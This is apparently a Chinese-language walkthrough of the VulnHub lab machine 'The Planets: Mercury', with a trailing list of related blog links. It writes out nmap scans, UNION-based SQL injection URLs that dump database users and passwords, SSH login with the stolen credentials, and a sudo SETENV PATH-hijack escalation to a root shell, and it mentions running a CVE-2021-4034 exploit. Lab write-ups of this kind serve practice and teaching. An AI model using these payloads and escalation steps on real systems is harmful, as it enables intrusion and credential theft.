The Planets: Mercury ~ VulnHub

靶机:

攻击机:

Linux kali 5.10.0-kali3-amd64 #1 SMP Debian 5.10.13-1kali1 (2021-02-08) x86_64 GNU/Linux

信息收集:

nmap 192.168.1.1/24

进一步探测端口信息

nmap -sS -sV -A -p- 192.168.1.114

访问一下8080端口,说是你好此网站目前正在开发中,请稍后再查看。

随便访问一下错误页面。

给了三个提示。

index

robots.txt

点击一下

有id。换一下id试试

一直到8都是有内容的。

尝试报错

貌似存在注入点。 常规测试。貌似还不用闭合。直接注入

开始爆库。http://192.168.1.114:8080/mercuryfacts/8%20union%20select%20database()/

爆表

192.168.1.114:8080/mercuryfacts/8 union select group_concat(table_name) from information_schema.tables where table_schema='mercury'/

发现users表。

爆列

192.168.1.114:8080/mercuryfacts/8 union select group_concat(column_name) from information_schema.columns where table_name='users'/

爆内容:

http://192.168.1.114:8080/mercuryfacts/8%20union%20select%20group_concat(id,password,username)%20from%20users/http://192.168.1.114:8080/mercuryfacts/8%20union%20select%20group_concat(id,password,username)%20from%20users/得到账号密码:

1 johnny1987  john

2 lovemykids111  laura

3 lovemybeer111  sam

4 mercuryisthesizeof0.056Earths  webmaster

开始登陆。这里只有用22端口进行登陆。

登陆成功。

发现两个文件

分别查看一下,发现了两个用户,webmaster和linuxmaster。

发现后面的字符像是base64编码,解一下。

得到明文,这里进行登陆linuxmaster。

登陆成功,查看权限

看到这个.sh文件是root权限。看到了SETENV。

这里百度查了一下。看到了一个sudo+SETENV的提权。

sudo+SETENV(环境变量)提权 - 码农教程

大家可参考以上链接。原理就是:

sudo运行时默认会启用env_reset选项将从命令行设置的环境变量复原,因此通常情况下,当使用sudo命令时,通过本地修改环境变量也没法替换目标文件来进行提权,但如果sudo在配置时为用户设置了SETENV选项,情况就不一样了。SETENV会允许用户禁用env_reset选项,允许sudo使用当前用户命令行中设置的环境变量,如下图:sudo允许当前用户以root身份执行一个shell脚本,并为当前用户配置了SETENV,shell脚本是打印syslog最后几行。

如果没有配置SETENV,这里是无法通过改环境变量把tail替换成一个vim命令来进行提权的。这里有SETENV,那么就可以设置环境变量

现在开始提权。

第一步:新建一个tail的提权脚本

echo "/bin/bash" > tail

再对其进行赋权。

第二步:通过下面的命令,将当前目录放置在PATH环境变量的最前面

export PATH=.:$PATH

第三步:通过下面的命令即可运行我们伪造的tail命令,从而用vim进行提权

sudo --preserve-env=PATH /usr/bin/check_syslog.sh

拿到flag。

做法二:利用CVE-2021-4034。这个更简单,只需要把exp复制进去,再执行就可完成提权。

这个是比较新的一个漏洞了,所以vulnhub的靶机几乎全杀。

vulnhub-The Planets: Mercury相关推荐

  1. 看完这篇 教你玩转渗透测试靶机Vulnhub——The Planets:Mercury

    Vulnhub靶机The Planets:Mercury渗透测试详解 Vulnhub靶机介绍: Vulnhub靶机下载: Vulnhub靶机安装: Vulnhub靶机漏洞详解: ①:信息收集: ②:漏 ...

  2. vulnhub靶场——THE PLANETS: MERCURY

    THE PLANETS:MECURY 准备 攻击机: kali 靶机: THE PLANETS:MECURY NAT 192.168.91.0 网段 下载连接: https://www.vulnhub ...

  3. 看完这篇 教你玩转渗透测试靶机Vulnhub——The Planets:Venus

    Vulnhub靶机The Planets:Venus渗透测试详解 Vulnhub靶机介绍: Vulnhub靶机下载: Vulnhub靶机安装: Vulnhub靶机漏洞详解: ①:信息收集: ②:SSH ...

  4. vulnhub THE PLANETS: EARTH渗透笔记

    靶机下载地址:https://www.vulnhub.com/entry/the-planets-earth,755/#download kali ip地址 信息收集 nmap -sP 192.168 ...

  5. vulnhub THE PLANETS: EARTH

    本文参考了大佬的文章: https://blog.gibbons.digital/hacking/2021/11/09/earth.html 好久没做靶机了,周末做做靶机挺好的 老三样,先确定靶机地址 ...

  6. 靶机渗透练习82-The Planets:Mercury

    靶机描述 靶机地址:https://www.vulnhub.com/entry/the-planets-mercury,544/ Description Difficulty: Easy Mercur ...

  7. 靶机渗透练习90-Grotesque:1.0.1

    靶机描述 靶机地址:https://www.vulnhub.com/entry/grotesque-101,658/ Description get flags difficulty: medium ...

  8. 【Kaggle Learn】Python 5-8

    五. Booleans and Conditionals Using booleans for branching logic x = True print(x) print(type(x))''' ...

  9. C++ 基础知识总结

    目录 一.C++杂项总结 (3)用cout输出十进制.十六进制和八进制显示整数 (5)变量auto (8)C++11中新增的基于范围的for循环 (9)头文件cctype中的字符函数 (10)位运算详 ...

最新文章

  1. RTC时间在LCD上显示需注意的问题
  2. LCS(最长公共子串)系列问题
  3. ASP.NET Core 异常重试组件 Polly
  4. MySQL 中主键的几种表设计组合的实际应用效果
  5. 局域网延时大怎么办?
  6. 整合rabbitmq+redis发送验证码消息
  7. 深入理解计算机操作系统:第2章 信息的表示和处理(学习笔记)
  8. C++ Linux下线程池的实现
  9. Spring整合ibatis的配置
  10. Linux网络编程 | 定时事件 :Linux常见定时方法、定时器链表、空闲断开
  11. Qt5.6.0+OpenGL 纹理贴图首战告捷
  12. Java Web学习总结(44)—— RESTful 架构和 RESTful API 设计总结
  13. [渝粤教育] 西南科技大学 铁路交通信号控制 在线考试复习资料
  14. android问卷分页显示,基于Android的问卷调查客户端题目分页加载实现.doc
  15. LeetCode Student Attendance Record I
  16. PythonHDF5目录
  17. 在VS Code中用插件记录写代码时间
  18. ActiveX控件开发流程
  19. PS命令各字段英文全称
  20. 10款暗色质感和黑白效果LR预设

热门文章

  1. torch中contiguous()函数
  2. 如果实现银行卡三四要素? 银行卡实名认证
  3. ascp下载ebi ncbi数据库大文件
  4. overflow属性值
  5. gstreamer用法
  6. div section和article区别
  7. 技术人员创业的第一步分析
  8. 数据结构之链表-链表的创建
  9. 高颜值测试报告- XTestRunner
  10. Resilient Distributed Datasets: A Fault-Tolerant Abstraction for In-Memory Cluster Computing 阅读笔记